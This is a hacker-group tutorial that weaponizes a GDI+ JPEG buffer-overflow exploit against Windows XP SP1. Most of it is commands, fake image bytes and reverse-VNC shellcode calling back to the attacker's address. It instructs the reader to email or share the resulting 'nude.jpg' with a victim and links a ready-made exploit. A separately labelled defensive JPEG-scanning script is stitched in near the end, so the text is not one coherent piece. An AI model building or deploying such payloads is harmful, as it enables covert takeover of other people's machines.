Intro to Buffer Overflows - A whitepaper demonstrating a buffer overflow on a Windows XP SP1 box using Backtrack 3 Beta.
Intro to Buffer Overflows
By IMC Tullywacker
Shouts
IMC GrahamPhisher
IMC EXE
IMC TwiZted
IMC PhirePhreak
Insanemasterminds.com
GrahamPhisher.com
remote-exploit.org
Hello, today I am going to show you how to perform a buffer overflow on a Windows XP SP1 box. I
am going to be using Backtrack 3 Beta, as should you, so you can follow along easily.
If you are unfamiliar with buffer overflows I suggest you read up on them before proceeding to the tutorial.
http://en.wikipedia.org/wiki/Buffer_overflow
OK, let's begin: fire up Backtrack.
Open up a new terminal.
Code:
cd /pentest/exploits/milw0rm
OK, now let's search the sploitlist for GDI exploits:
Code:
cat sploitlist.txt |grep -i GDI
OK, now copy the 475.sh sploit to the /tmp/ directory:
Code:
cp ./platforms/windows/remote/475.sh /tmp/
Now let's edit the file to better suit our needs:
Code:
nano /tmp/475.sh
We need to set the address of the shellcode for a Windows XP SP1 English box, so comment out the 1st line and uncomment the
2nd, like so:
Code:
#********************************************
#Address of shellcode
#********************************************
#printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0
Next, there are formatting problems in the image junk section that need to be corrected:
Code:
#********************************************
#Image junk here...fake JPG
#********************************************
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf "\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf "\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf "\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf "\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf "\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf "\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf "\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf "\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf "\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf "\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";
Now let's edit the shellcode area. We need to replace \xCC with a NOP (\x90) and fix another formatting issue:
Code:
#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\x90\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it works!
OK, next fix yet another formatting issue:
Code:
#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************
Now, the original purpose of this exploit is to add an administrator account, as you can see from the line
above. We are going to use a reverse VNC connection instead, because a nice GUI is always the most fun.
You can do it the original way if you want, just to see that the sploit works, but here at IMC we strive to do shit differently :)
Now cd to the framework2 directory:
Code:
cd /pentest/exploits/framework2
To view all the payloads, type:
Code:
./msfpayload
We're going to use the win32_reverse_vncinject payload.
Now, to see which variables need to be set, we type:
Code:
./msfpayload win32_reverse_vncinject
As you can see, the only field left blank is the LHOST option, so we need our LAN IP address:
Code:
ifconfig
Code:
inet addr:192.168.1.113
Now we need to generate our custom payload and put it into our sploit:
Code:
./msfpayload win32_reverse_vncinject LHOST=192.168.1.113 P
This will return the payload suited to our needs (the trailing P selects Perl-style output, which is why the lines below end in a period).
Here's mine:
Code:
"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
"\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
"\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
"\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";
So copy your payload, and now let's put it in our sploit:
Code:
nano /tmp/475.sh
Code:
#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************
printf "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
printf "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
printf "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
printf "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
printf "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
printf "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
printf "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
printf "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
printf "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
printf "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
printf "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
printf "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
printf "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
printf "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
printf "\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
printf "\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
printf "\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";
Now we need to set up our payload handler:
Code:
../msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=192.168.1.102
Now you need to turn your sploit into a .jpg file:
Code:
cd /tmp/
chmod +x 475.sh
./475.sh > nude.jpg
Now what you're going to do is give the victim the file: email, share, whatever, it's up to you.
All you have to do now is sit and wait for the victim to open a folder containing the malicious .jpg file; they
don't even have to open it! This will spawn a VNC session and give you a GUI of the computer.
Congrats on making your 1st malicious JPG file.
For all you lazy people, I've uploaded the modified sploit; all you have to do is change the payload:
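From the defensive side, a file built the way this tutorial describes (hand-written marker segments, a payload that must avoid the FFD9 End-Of-Image marker) is exactly what a structural JPEG check can catch before the image reaches a victim's folder. The marker-segment walker below is an added example, not part of this whitepaper or of 475.sh: it rejects any segment whose length field is below 2 (the field counts its own two bytes, so a smaller value is invalid), reports data after FFD9, and reports a missing FFD9. The sample images and the scan_jpeg name are constructed for this example.

```python
# Added example (not from the whitepaper or 475.sh): a defensive JPEG
# marker-segment walker. The sample inputs at the bottom are constructed.
import struct

EOI, SOS = 0xD9, 0xDA
# Markers that carry no length field: SOI, EOI, TEM and RST0..RST7.
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))


def scan_jpeg(data: bytes) -> list:
    """Return anomaly strings; an empty list means the marker layout is
    well-formed (it says nothing about the image content itself)."""
    findings = []
    if data[:2] != b"\xFF\xD8":
        return ["missing SOI (FFD8) at offset 0"]
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            return findings + [f"expected marker at {pos:#x}, got {data[pos]:#04x}"]
        marker = data[pos + 1]
        if marker == 0xFF:  # fill byte, legal before a marker
            pos += 1
            continue
        if marker == EOI:
            extra = len(data) - pos - 2
            if extra:
                findings.append(f"{extra} trailing bytes after EOI (FFD9)")
            return findings
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            return findings + [f"segment {marker:#04x} at {pos:#x} has no length field"]
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2:  # the field counts its own two bytes, so < 2 is invalid
            return findings + [f"segment {marker:#04x} at {pos:#x} declares length {length} (< 2)"]
        if marker == SOS:
            # Entropy-coded scan data follows; the page notes FFD9 must not
            # appear inside it, so the first FFD9 after the header is the end.
            end = data.find(b"\xFF\xD9", pos + 2 + length)
            pos = end if end != -1 else len(data)
            continue
        pos += 2 + length
    findings.append("no EOI (FFD9) marker found")
    return findings


# Constructed samples: minimal valid file, COM length below minimum, data after EOI.
CLEAN_JPEG = b"\xFF\xD8" + b"\xFF\xFE\x00\x05hey" + b"\xFF\xD9"
BAD_LENGTH_JPEG = b"\xFF\xD8" + b"\xFF\xFE\x00\x01" + b"\xFF\xD9"
TRAILING_JPEG = b"\xFF\xD8\xFF\xD9" + b"AAAA"
```

A clean result only means the marker structure is consistent; a scanner would still hand the file to a patched decoder rather than treat it as safe.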
Code:
http://imctully.hostaim.com/maliciousjpg.txt
~Tully